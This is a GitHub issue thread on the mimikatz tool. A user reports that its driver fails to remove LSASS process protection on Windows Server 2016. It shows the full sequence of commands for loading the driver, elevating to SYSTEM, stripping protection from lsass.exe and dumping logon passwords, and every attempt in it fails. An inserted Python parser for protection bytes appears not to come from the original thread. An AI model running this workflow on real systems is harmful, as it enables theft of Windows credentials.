gentilkiwi / mimikatz

A little tool to play with Windows security
http://blog.gentilkiwi.com/mimikatz

!processProtect permission changing issue #352

Open ToTheFarWest opened 3 years ago

ToTheFarWest commented 3 years ago

Version info

mimikatz # version

mimikatz 2.2.0 (arch x64)
Windows NT 10.0 build 14393 (arch x64) ## Windows Server 2016 Version 1607
msvc 150030729 207

Issue

Mimikatz with mimidrv is unable to change PS_PROTECTION struct for any process

Reproducing

Open mimikatz.exe as Administrator

mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

688 {0;000003e7} 1 D 31914      NT AUTHORITY\SYSTEM S-1-5-18    (04g,21p)   Primary
 -> Impersonated !
 * Process Token : {0;0003aced} 1 F 408572      CYBER\Student   S-1-5-21-25820147-2451064938-3468183638-1103    (15g,26p)   Primary
 * Thread Token  : {0;000003e7} 1 D 834134      NT AUTHORITY\SYSTEM S-1-5-18    (04g,21p)   Impersonation (Delegation)

mimikatz # !processProtect /process:lsass.exe /remove
Process : lsass.exe
PID 756 -> 00/00 [0-0-0]

mimikatz # sekurlsa::logonPasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

[Image: LSASS in Process Explorer]

Trying to elevate Mimikatz.exe to Protected...

mimikatz # !processProtect /process:mimikatz.exe
Process : mimikatz.exe
PID 4268 -> 3f/3f [2-0-6]

mimikatz # sekurlsa::logonPasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

[Image: mimikatz.exe in Process Explorer]

ToTheFarWest commented 3 years ago

Output of !process also seems broken

mimikatz # !process
4   System          F-Tok   Sig 00/00 [0-0-0]
476 smss.exe        F-Tok   Sig 00/00 [0-0-0]
560 csrss.exe       F-Tok   Sig 00/00 [0-0-0]
624 smss.exe        F-Tok   Sig 00/00 [0-0-0]
632 wininit.exe     F-Tok   Sig 00/00 [0-0-0]
644 csrss.exe       F-Tok   Sig 00/00 [0-0-0]
688 winlogon.exe    F-Tok   Sig 00/00 [0-0-0]
748 services.exe    F-Tok   Sig 00/00 [0-0-0]
756 lsass.exe       F-Tok   Sig 00/00 [0-0-0]
900 svchost.exe     F-Tok   Sig 00/00 [0-0-0]
940 svchost.exe     F-Tok   Sig 00/00 [0-0-0]
464 dwm.exe         F-Tok   Sig 00/00 [0-0-0]
912 svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1016    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1040    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1060    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1108    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1184    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1412    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1592    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1080    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1836    spoolsv.exe     F-Tok   Sig 00/00 [0-0-0]
872 Microsoft.Acti  F-Tok   Sig 00/00 [0-0-0]
1760    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
1896    dfsrs.exe       F-Tok   Sig 00/00 [0-0-0]
2076    dns.exe         F-Tok   Sig 00/00 [0-0-0]
2084    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
2092    ismserv.exe     F-Tok   Sig 00/00 [0-0-0]
2120    vmtoolsd.exe    F-Tok   Sig 00/00 [0-0-0]
2128    VGAuthService.  F-Tok   Sig 00/00 [0-0-0]
2152    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
2184    wlms.exe        F-Tok   Sig 00/00 [0-0-0]
2240    dfssvc.exe      F-Tok   Sig 00/00 [0-0-0]
2548    sppsvc.exe      F-Tok   Sig 00/00 [0-0-0]
2656    WmiPrvSE.exe    F-Tok   Sig 00/00 [0-0-0]
2744    vds.exe         F-Tok   Sig 00/00 [0-0-0]
2848    dllhost.exe     F-Tok   Sig 00/00 [0-0-0]
3000    msdtc.exe       F-Tok   Sig 00/00 [0-0-0]
2908    WmiPrvSE.exe    F-Tok   Sig 00/00 [0-0-0]
3092    SppExtComObj.E  F-Tok   Sig 00/00 [0-0-0]
3664    RuntimeBroker.  F-Tok   Sig 00/00 [0-0-0]
3700    svchost.exe     F-Tok   Sig 00/00 [0-0-0]
3708    sihost.exe      F-Tok   Sig 00/00 [0-0-0]
3728    taskhostw.exe   F-Tok   Sig 00/00 [0-0-0]
4000    userinit.exe    F-Tok   Sig 00/00 [0-0-0]
4020    explorer.exe    F-Tok   Sig 00/00 [0-0-0]
3564    ShellExperienc  F-Tok   Sig 00/00 [0-0-0]
3536    SearchUI.exe    F-Tok   Sig 00/00 [0-0-0]
4340    ServerManager.  F-Tok   Sig 00/00 [0-0-0]
4388    GoogleCrashHan  F-Tok   Sig 00/00 [0-0-0]
4428    GoogleCrashHan  F-Tok   Sig 00/00 [0-0-0]
5000    vm3dservice.ex  F-Tok   Sig 00/00 [0-0-0]
5012    vmtoolsd.exe    F-Tok   Sig 00/00 [0-0-0]
4268    mimikatz.exe    F-Tok   Sig 3f/3f [2-0-6]
4288    conhost.exe     F-Tok   Sig 00/00 [0-0-0]
4540    wermgr.exe      F-Tok   Sig 00/00 [0-0-0]
2724    procexp.exe     F-Tok   Sig 00/00 [0-0-0]
4304    PROCEXP64.exe   F-Tok   Sig 00/00 [0-0-0]
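As an added example, not code from this issue or from the mimikatz project: a Python decoder for the PS_PROTECTION byte (Type:3, Audit:1, Signer:4, as declared in ntddk.h) and for the `!process` row format shown above, plus a sanity check that flags a listing in which the processes Windows normally runs as PPL all read back as unprotected. The default-PPL set and the expected lsass.exe value under RunAsPPL are assumptions taken from documented Windows 8.1+ behaviour, and the sample rows are copied from this report.

```python
import re

# PS_PROTECTION (ntddk.h): one UCHAR holding Type:3, Audit:1, Signer:4.
PROTECTED_TYPES = {0: "None", 1: "ProtectedLight", 2: "Protected"}
PROTECTED_SIGNERS = {0: "None", 1: "Authenticode", 2: "CodeGen", 3: "Antimalware",
                     4: "Lsa", 5: "Windows", 6: "WinTcb", 7: "WinSystem", 8: "App"}
# Processes Windows 8.1+ runs as PPL (WinTcb-Light) by default; assumption taken from
# documented defaults. lsass.exe is PPL only with RunAsPPL, so it is checked separately.
EXPECTED_PPL = {"smss.exe", "csrss.exe", "wininit.exe", "services.exe"}
# One "!process" row: PID, image, flags, SigLevel/SectionSigLevel [Type-Audit-Signer]
LINE_RE = re.compile(r"^\s*(\d+)\s+(\S+)\s+.*?\s([0-9a-f]{2})/([0-9a-f]{2})\s+\[(\d)-(\d)-(\d)\]\s*$", re.I)

def decode_ps_protection(level: int) -> dict:
    """Split a PS_PROTECTION.Level byte into its three bit fields."""
    return {"type": PROTECTED_TYPES.get(level & 0x7, f"Unknown({level & 0x7})"),
            "audit": bool((level >> 3) & 0x1),
            "signer": PROTECTED_SIGNERS.get(level >> 4, f"Unknown({level >> 4})")}

def encode_ps_protection(ptype: int, audit: int, signer: int) -> int:
    """Pack the fields back into the stored byte (e.g. Type 2, Audit 0, Signer 6 -> 0x62)."""
    return (ptype & 0x7) | ((audit & 0x1) << 3) | ((signer & 0xF) << 4)

def parse_process_line(line: str):
    """Parse one listing row; returns None for lines that are not process rows."""
    m = LINE_RE.match(line)
    if not m:
        return None
    pid, image, sig, sec_sig, ptype, audit, signer = m.groups()
    level = encode_ps_protection(int(ptype), int(audit), int(signer))
    return {"pid": int(pid), "image": image, "signature_level": int(sig, 16),
            "section_signature_level": int(sec_sig, 16), "protection": decode_ps_protection(level)}

def check_listing(listing: str) -> dict:
    """Flag a listing in which the default-PPL processes read back unprotected. A kernel read
    that returns zeros for all of them most likely means the EPROCESS offsets used do not match
    the running build, not that protection is really absent, so the listing is untrustworthy."""
    rows = [r for r in map(parse_process_line, listing.splitlines()) if r]
    zero_reads = sorted({r["image"] for r in rows
                         if r["image"].lower() in EXPECTED_PPL and r["protection"]["type"] == "None"})
    lsass = [r for r in rows if r["image"].lower() == "lsass.exe"]
    # With RunAsPPL, lsass.exe should read as ProtectedLight with the Lsa signer (0x41).
    lsass_ppl = bool(lsass) and lsass[0]["protection"] == decode_ps_protection(0x41)
    return {"processes": len(rows), "suspect_zero_reads": zero_reads,
            "offsets_suspect": bool(zero_reads), "lsass_reads_as_ppl": lsass_ppl}

# Constructed sample: four rows copied from the listing in this issue.
SAMPLE_LISTING = """476 smss.exe        F-Tok   Sig 00/00 [0-0-0]
560 csrss.exe       F-Tok   Sig 00/00 [0-0-0]
756 lsass.exe       F-Tok   Sig 00/00 [0-0-0]
4268    mimikatz.exe    F-Tok   Sig 3f/3f [2-0-6]"""
```

Running `check_listing(SAMPLE_LISTING)` on the rows above reports smss.exe and csrss.exe as suspect zero reads and sets `offsets_suspect` to True.
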

ryuke-acker commented 1 year ago

Hey, I'm getting the same issue, exact same version. Did you ever find a solution?